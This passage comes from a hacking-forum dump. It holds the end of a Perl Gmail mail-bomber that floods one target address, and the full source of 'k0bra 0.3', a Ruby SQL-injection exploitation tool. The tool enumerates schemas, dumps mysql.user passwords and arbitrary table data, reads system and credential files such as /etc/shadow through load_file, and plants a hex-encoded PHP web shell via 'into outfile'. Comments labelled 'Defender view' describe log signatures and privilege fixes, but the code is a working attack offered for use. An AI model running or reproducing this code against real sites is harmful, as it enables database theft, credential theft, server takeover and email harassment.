)->place( -x => 75, -y => 212 );

$ve->Label(
    -text       => "Target : ",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 20, -y => 240 );
my $to = $ve->Entry(
    -text       => 'idiot@gmail.com',
    -width      => 30,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 73, -y => 242 );

$ve->Label(
    -text       => "Subject : ",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 20, -y => 270 );
my $tema = $ve->Entry(
    -text       => "Hi idiot",
    -width      => 20,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 73, -y => 273 );

$ve->Label(
    -text       => "Body",
    -font       => "Impact3",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 110, -y => 310 );
my $body = $ve->Text(
    -width      => 30,
    -height     => 12,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 45, -y => 350 );
$body->insert( "end", "Welcome to the hell" );

# Action buttons: Send runs start(), About runs about(), Exit destroys the
# main window.
$ve->Button(
    -text             => "Send",
    -width            => 10,
    -command          => \&start,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->place( -x => 43, -y => 550 );
$ve->Button(
    -text             => "About",
    -width            => 10,
    -command          => \&about,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->place( -x => 117, -y => 550 );
$ve->Button(
    -text             => "Exit",
    -width            => 10,
    -command          => [ $ve => "destroy" ],
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->place( -x => 190, -y => 550 );

# Hand control to the Tk event loop; the subs below run as button callbacks.
MainLoop;

# "Send" callback: log in with the entered account and send the same message
# to the one target address as many times as the "Number" field says, then
# show a Windows message box with the outcome.
#
# Defender view: the loop has no delay or throttling, so the volume is bounded
# only by the "Number" field; the sending limits and abuse controls of the
# mail provider are what apply.
sub start {

    # $text is an undeclared package global (the file has no `use strict`).
    $text = $body->get( "1.0", "end" );
    chomp $text;

    # Success is judged only by whether the constructor returns a true value.
    if (
        my $mail = Email::Send::SMTP::Gmail->new(
            -smtp  => "gmail.com",
            -login => $user->get,
            -pass  => $pass->get
        )
      )
    {

        # The loop variable reuses the name of the $number Entry widget; the
        # range's upper bound is the widget's text, taken as typed.
        for my $number ( 1 .. $number->get ) {
            # Let Tk redraw between messages; sending blocks the callback.
            $ve->update;
            # The result of each send is not checked.
            $mail->send(
                -to      => $to->get,
                -subject => $tema->get,
                -body    => $text
            );
        }

        Win32::MsgBox( "Send", 0, "Mails Send" );

        $mail->bye;

    }
    else {
        Win32::MsgBox( "Error in the login", 0, "Error" );
    }
}

# "About" callback: show a Windows message box with the author credit. The
# string literal spans two source lines, so it contains a line break.
sub about {

    my $text =
"This program was written by Doddy H for the Tournament of Programming Perl
to forum HackxCrack";

    Win32::MsgBox( $text, 0, "About" );

}

#The End ?
#380
Scripting / [Ruby] k0bra 0.3
16 Febrero 2012, 18:16 PM
Un simple scanner SQLI con las siguientes funciones


  • Comprobar vulnerabilidad
  • Buscar numero de columnas
  • Buscar automaticamente el numero para mostrar datos
  • Mostrar tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar informacion sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados



    #!usr/bin/ruby
    #K0bra 0.3
    #Coded By Doddy H

    require "net/http"

    $files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log'
,'/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/
usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.
cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog']

    # Performs an HTTP GET for +web+ and hands back the response body.
    # No timeout, redirect or error handling is applied here.
    def toma(web)
      destino = URI.parse(web)
      respuesta = Net::HTTP.get_response(destino)
      return respuesta.body
    end

    # Prints the author banner, then blocks until one line is read from
    # standard input; the chomped line is the return value.
    def copyright()
      banner = "\n\n(C) Doddy Hackman 2012\n\n"
      print banner
      entrada = gets
      entrada.chomp
    end

    # Ensures a "logs_webs" directory exists under the current working
    # directory; it is created only when missing.
    def installer()
      carpeta = "#{Dir.pwd}/logs_webs"
      Dir.mkdir(carpeta) unless File.directory?(carpeta)
    end

    # Returns the bytes of +texto+ as a lowercase hex string prefixed with "0x".
    def encodehex(texto)
      hexadecimal = texto.unpack('H*').first
      "0x" + hexadecimal
    end

    # Appends +text+ plus a newline to logs_webs/<host>.txt, where <host> is the
    # host component of the URL given as +file+. The logs_webs directory must
    # already exist.
    def savefile(file,text)
      host = URI.parse(file).host
      ruta = "logs_webs/" + host + ".txt"
      registro = File.open(ruta, "a")
      registro.puts(text + "\n")
      registro.close
    end

    # Maps the operator-chosen mode string to a two-element result
    # (separator, terminator): the callers splice the first between SQL
    # keywords and append the second at the end of the request. Any mode
    # other than "/*" or "%20" yields the "+" / "--" pair.
    def bypass(op)
      case op
      when "/*"
        return "/**/","/**/"
      when "%20"
        return "%20","%00"
      else
        return "+","--"
      end
    end

    # Prints the ASCII-art program banner to standard output.
    def head()
     
      print "
     
    @      @@   @             
    @@     @  @ @@             
    @ @@  @  @  @ @   @ @ @@@
    @ @   @  @  @@ @ @@@ @  @
    @@    @  @  @  @  @   @@@
    @ @   @  @  @  @  @  @  @
    @@@ @   @@   @@@  @@@ @@@@@

    "
    end

    # Shows a "press any key" prompt, waits for one line of input, then
    # returns to the start prompt.
    def volverinicio()
      aviso = "\n\n[+] Press any key to continue\n\n"
      print aviso
      gets.chomp
      return inicio()
    end

    # Clears the terminal: "cls" when RUBY_PLATFORM matches /win/, "clear"
    # otherwise. The pattern is unanchored, so it also matches any platform
    # string that merely contains "win" (for example "darwin").
    def clean()
      comando = (RUBY_PLATFORM=~/win/) ? "cls" : "clear"
      system(comando)
    end

    # Shows a "press any key" prompt, waits for one line of input, then
    # re-enters the menu for the same +url+ and bypass mode +by+.
    def retorno(url,by)
      aviso = "\n\n[+] Press any key to continue\n\n"
      print aviso
      gets.chomp
      return central(url,by)
    end

    # Enumerates table names through an injection URL that carries the
    # "hackman" placeholder: the placeholder is replaced first by a
    # count(table_name) expression and then by table_name itself, each wrapped
    # in the 0x4b30425241 literal ("K0BRA") so the value can be cut out of the
    # response with /K0BRA(.*?)K0BRA/. Findings are printed and appended to
    # the per-host log through savefile().
    #
    # Defender view: the requests carry "information_schema.tables",
    # "unhex(hex(" and the 0x4b30425241 literal in the query string, one
    # request per row with an increasing "limit N,1". Binding the parameter
    # in a prepared statement on the server removes the injection point.
    def gettables(url,by)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
      print "\n\n[+] Getting tables ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] Tables Found : ",total,"\n\n"
        savefile(url,"\n[+] Tables Found : #{total}\n")
        # total is the String captured above, so this is a String range.
        for num in ("17"..total)
          code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*?)K0BRA/
            table = $1
            print "[+] Table Found : "+table+"\n"
            savefile(url,"[+] Table Found : #{table}")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end

    # Enumerates the column names of table +tablex+ via
    # information_schema.columns, using the same "hackman" placeholder and
    # K0BRA marker scheme as the other enumerators. The table name is sent as
    # a hex literal (encodehex), so the request contains no quote characters.
    #
    # Defender view: filters that only look for quote characters do not see
    # this request; match on "information_schema.columns" and the marker
    # literal instead, and fix the query with bound parameters.
    def getcolumns(url,by,tablex)
      tablexa = encodehex(tablex)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
      print "\n\n[+] Getting columns ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] Columns Found : ",total,"\n\n"
        savefile(url,"\n[+] Table : #{tablex}")
        savefile(url,"[+] Columns Found : #{total}\n")
        # One request per row; total is a String, so this is a String range.
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*?)K0BRA/
            table = $1
            print "[+] Column Found : "+table+"\n"
            savefile(url,"[+] Column Found : #{table}")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end

    # Enumerates database (schema) names via information_schema.schemata with
    # the "hackman" placeholder / K0BRA marker scheme: one count request, then
    # one request per row.
    #
    # Defender view: "information_schema.schemata" in a query string of a
    # public page is a strong log signature for this activity.
    def getdbs(url,by)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))")
      print "\n\n[+] Getting DBS ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] DBS Found : ",total,"\n\n"
        savefile(url,"\n[+] DBS Found : #{total}\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*?)K0BRA/
            table = $1    # holds a schema name here despite the variable name
            print "[+] DB Found : "+table+"\n"
            savefile(url,"[+] DB Found : #{table}")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end

    # Enumerates the tables of schema +dbx+ via information_schema.tables,
    # filtering on table_schema. The schema name is sent as a hex literal
    # (encodehex); extraction uses the K0BRA marker scheme.
    #
    # Defender view: an application account limited to its own schema keeps
    # this listing from exposing other applications' table names.
    def gettablesbydb(url,by,dbx)
      data  = encodehex(dbx)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
      print "\n\n[+] Getting tables ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] Tables Found : ",total,"\n\n"
        savefile(url,"\n[+] DBS : #{dbx}")
        savefile(url,"[+] Tables Found : #{total}\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*?)K0BRA/
            table = $1
            print "[+] Table Found : "+table+"\n"
            savefile(url,"[+] Table Found : #{table}")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end

    # Enumerates the columns of table +tab+ in schema +db+ via
    # information_schema.columns, filtering on both table_name and
    # table_schema. Both names are sent as hex literals; extraction uses the
    # K0BRA marker scheme.
    #
    # Defender view: same signature as the other enumerators
    # ("information_schema.columns" plus the 0x4b30425241 literal), repeated
    # once per column with an increasing "limit N,1".
    def getcolumnsbydb(url,by,db,tab)
      data = encodehex(db)
      tabx = encodehex(tab)
     
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
      print "\n\n[+] Getting columns ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] Columns Found : ",total,"\n\n"
        savefile(url,"\n[+] DB : #{db}")
        savefile(url,"[+] Table : #{tab}")
        savefile(url,"[+] Columns Found : #{total}\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*?)K0BRA/
            table = $1    # holds a column name here despite the variable name
            print "[+] Column Found : "+table+"\n"
            savefile(url,"[+] Column Found : #{table}")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end

    # Reads the Host, User and Password columns of mysql.user row by row.
    # Three marker pairs (K0BRA, K0BRA1, K0BRA2) delimit the three fields in
    # the response. The values, including the password column, are printed
    # and written in clear to the per-host log.
    #
    # Defender view: a web application's database account needs no SELECT
    # privilege on the mysql schema; without it this request returns nothing.
    # "mysql.user" in a request URL is worth alerting on.
    def mysqluser(url,by)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))")
       print "\n\n[+] Searching mysql.user\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] Users Mysql Found : ",total,"\n\n"
        savefile(url,"[+] Users Mysql Found : "+total+"\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/
            host,user,passw = $1,$2,$3
            print "[Host] : "+host
            print " [User] : "+user
            print " [Pass] : "+passw+"\n"   
            savefile(url,"[Host] : "+host)
            savefile(url,"[User] : "+user)
            savefile(url,"[Pass] : "+passw+"\n")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end

    # Collects basic facts about the database behind the injection point:
    # user(), database() and version() in one request, then three capability
    # probes (is mysql.user readable, is information_schema.tables readable,
    # does load_file() return data). Results are printed and logged.
    #
    # Defender view: each "ON" line corresponds to a privilege the application
    # account does not normally need: SELECT on the mysql schema and the
    # global FILE privilege. Revoking them turns the respective probe off.
    def details(url,by)
      pass1,pass2 = bypass(by)
      hextest = "0x2f6574632f706173737764" #/etc/passwd
      # The second assignment overrides the first; only this path is probed.
      hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
      web1 = url.sub(/hackman/,"0x4b30425241")
      web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
      # char(69,82,84,79,82,56,53,52) spells the marker "ERTOR854" tested below.
      web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))")
       print "\n\n[+] Extrating information of the DB\n\n"
      code1 = toma(web2)
      if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
        user,data,ver = $1,$2,$3
        print "\n[+] Username : "+user
        print "\n[+] Database : "+data
        print "\n[+] Version : "+ver+"\n\n"
        savefile(url,"\n[+] Username : "+user)
        savefile(url,"[+] Database : "+data)
        savefile(url,"[+] Version : "+ver+"\n")
      else
        print "[-] Not Found\n"
      end
       # Capability probes: the bare marker is selected from each source, so
       # the marker appearing in the page means the source was readable.
       code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
       code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
       code4 = toma(web3)
       if code2=~/K0BRA/
         print "[+] Mysqluser : ON\n"
         savefile(url,"[+] Mysqluser : ON")
       end
       if code3=~/K0BRA/
         print "[+] information_schema : ON\n"
         savefile(url,"[+] information_schema : ON")
       end
       if code4=~/ERTOR854/
         print "[+] load_file : ON\n"
         savefile(url,"[+] load_file : ON")
       end   
       savefile(url,"") # blank line
    end

    # Reads two columns (+col1+, +col2+) of +table+ row by row through the
    # injection point and logs every value pair. The table and column names
    # are concatenated into the request exactly as the operator typed them.
    #
    # Defender view: this is the data-exfiltration step; it appears as a long
    # run of near-identical requests that differ only in the "limit N,1"
    # offset. Rate-based alerting on a single parameterised page catches it
    # even when no keyword signature is in place.
    def dumper(url,by,table,col1,col2)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))")
      print "\n\n[+] Getting Values ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+table+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        savefile(url,"\n[+] Table : "+table)
        savefile(url,"[+] Column 1 : "+col1)
        savefile(url,"[+] Column 2 : "+col2)
        print "[+] Values Found : ",total,"\n\n"
        savefile(url,"\n[+] Values Found : #{total}\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2)
          # Greedy groups: the split falls on the last marker positions.
          if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/
            uno,dos = $1,$2
            print "\n[+] "+col1+" : "+uno+"\n"
            print "[+] "+col2+" : "+dos+"\n"
            savefile(url,"\n[+] "+col1+" : "+uno)
            savefile(url,"[+] "+col2+" : "+dos)
          end
        end
      else
        print "[-] Not Found\n"
      end
    end

    # Walks the global $files path list and asks the database to return each
    # file through load_file(), with the path sent as a hex literal and the
    # content wrapped in the ERTOR854 marker. Every file that comes back is
    # printed and copied into the per-host log.
    #
    # Defender view: load_file() only works for an account holding the global
    # FILE privilege and only inside the directory allowed by MySQL's
    # secure_file_priv setting; a web application account should not have
    # FILE at all. In access logs this shows as one request per list entry,
    # each containing "load_file(0x".
    def fuzzfile(url,by)
      pass1,pass2 = bypass(by)    # not used further in this method
      print "\n\n[+] Fuzzing Files with load_file ....\n"
      $files.each do |file|
        res = file    # keep the readable path for the report
        file = file.chomp
        file = encodehex(file)
        web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
        code = toma(web1)
        # /m lets the capture span the line breaks of the returned file.
        if code=~/ERTOR854(.*?)ERTOR854/m
          print "\n\n[File Found] : ",res
          print "\n\n[Source Start]\n"
          print $1
          print "\n[Source End]"
          savefile(url,"\n[File Found] : "+res)
          savefile(url,"\n[Source Start]\n")
          savefile(url,$1)
          savefile(url,"\n[Source End]")
        end   
      end
    end

    # Single-file variant of fuzzfile(): requests one operator-supplied path
    # through load_file() and prints/logs the content found between the
    # ERTOR854 markers, or prints an error when the markers are absent.
    #
    # Defender view: the same controls apply as for the list-driven variant.
    # Withhold the FILE privilege from the application account and keep
    # secure_file_priv restricted.
    def abrirfile(url,by,file)
      pass1,pass2 = bypass(by)    # not used further in this method
      print "\n\n[+] Opening file ....\n"
      res = file    # keep the readable path for the report
      file = encodehex(file)
        web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
        code = toma(web1)
        if code=~/ERTOR854(.*?)ERTOR854/m
          print "\n\n[File Found] : ",res
          print "\n\n[Source Start]\n"
          print $1
          print "\n[Source End]"
          savefile(url,"\n[File Found] : "+res)
          savefile(url,"\n[Source Start]\n")
          savefile(url,$1)
          savefile(url,"\n[Source End]")
        else
          print "\n\n[-] Error\n\n"
        end   
    end

    # Attempts to make the database write a file named cmd.php into the
    # directory +full+ via "into outfile", then fetches http://<host><dir>/cmd.php
    # and checks the response for the string "Mini Shell By Doddy" to decide
    # whether the write succeeded.
    #
    # The hex literal in +linea+ decodes to a one-line PHP page with that
    # title which passes a request parameter to the operating system shell,
    # i.e. a web shell.
    #
    # Defender view: this needs three things at once: the FILE privilege on
    # the database account, a secure_file_priv setting that permits the target
    # directory, and a web root writable by the database server's OS user.
    # Removing any one of them blocks the write. Detection: "into outfile"
    # in a request URL, and an unexpected cmd.php appearing under the
    # document root (file-integrity monitoring).
    def into(url,by,full,dir)
      pass1,pass2 = bypass(by)
      linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
      lugar = full+"/cmd.php"       # filesystem path handed to the database
      lugardos = dir+"/cmd.php"     # URL path used for the follow-up check
      h = URI.parse(url)
      webtest = "http://"+h.host+lugardos
      web1 = url.sub(/hackman/,linea)
      formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
      toma(formandoweb)
      code = toma(webtest)
      if code=~/Mini Shell By Doddy/
        print "\n\n[shell up] : "+webtest+"\n"
        savefile(url,"\n[shell up] : "+webtest+"\n")
      else
        print "\n\n[-] Error\n"
      end
    end

    # Main menu. Shows the current injection URL and bypass mode, reads one
    # option from standard input and dispatches to the matching action; every
    # action ends in retorno(), which calls central() again, so the menu is
    # re-entered by recursion rather than by a loop.
    #
    # +url+ is the injection URL containing the "hackman" placeholder and
    # +by+ the bypass mode string understood by bypass().
    def central(url,by)
      clean()
      head()
      print "\n\n[+] Page : #{url}\n"
      print "[+] ByPass : #{by}\n\n\n"

      print "\n[information_schema]\n\n"
      print "1 - Show tables\n"
      print "2 - Show columns of the a table\n"
      print "3 - Show databases\n"
